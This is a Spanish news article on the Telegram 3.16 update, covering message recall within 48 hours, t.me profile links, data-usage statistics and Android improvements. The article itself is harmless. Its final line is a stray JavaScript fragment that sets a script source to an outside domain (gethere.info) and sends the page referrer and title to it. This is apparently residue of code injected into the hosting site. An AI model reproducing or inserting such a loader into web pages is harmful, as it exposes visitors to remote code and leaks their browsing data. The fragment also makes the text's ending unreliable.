Con la última actualización de la ‘app’, los contenidos pueden recuperarse del dispositivo de los destinatarios
Telegram ha dado la bienvenida a 2017 con la versión 3.16 de su app para iOS y Android, que incluye nuevas funcionalidades disponibles desde este mismo martes. La principal de ellas es la posibilidad de rescatar mensajes compartidos en chats y grupos, lo que implica eliminarlos de los dispositivos de los destinatarios siempre y cuando no hayan pasado más de 48 horas desde el envío. Hasta el momento, durante ese mismo periodo de tiempo, Telegram permitía corregir mensajes ya enviados, con la particularidad de que el receptor era advertido de que ese contenido había sido editado. Además, antes de esta actualización la aplicación ya contaba con la opción de borrar mensajes de los terminales de los destinatarios si las conversaciones habían sido mantenidas en los llamados “chats secretos”, donde también es posible compartir mensajes que se autodestruyen, al estilo de Snapchat. Una beta recientemente filtrada de WhatsApp para iPhone dejaba abierta la misma posibilidad.
Otra de las novedades de la versión 3.16 es que a partir de ahora será posible utilizar enlaces t.me, en lugar de telegram.me, para compartir perfiles de usuarios, una opción a la que recurren aquellos que quieren chatear en Telegram, así como formar parte de sus canales y grupos públicos, sin la necesidad de proporcionar su número de teléfono. Por lo tanto, las cuentas de los miembros de esta app seguirán la estructura t.me/nombredeusuario, algo que también se aplicará a los nombres de los canales (por ejemplo, t.me/telegram) y los grupos públicos (como t.me/snowballfight).
La tercera funcionalidad añadida a esta actualización es la obtención de estadísticas del tráfico en Telegram, de tal modo que el usuario podrá conocer el consumo que realiza en conexiones de datos móviles y wifi cada vez que utiliza esta app. Para ello, tan sólo debe ir al menú Ajustes>Datos y almacenamiento>Uso de almacenamiento y red. Desde ahí sabrá la cantidad de bytes enviados y recibidos clasificados por modo de conexión (datos móviles o wifi) y tipo de archivo compartido (fotos, vídeos, mensajes de voz y mensajes de texto).
Finalmente, conscientes de que el 85% de las descargas de Telegram son para dispositivos Android, los responsables de esta app han incluido mejoras de usabilidad en la versión del sistema operativo de Google.
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;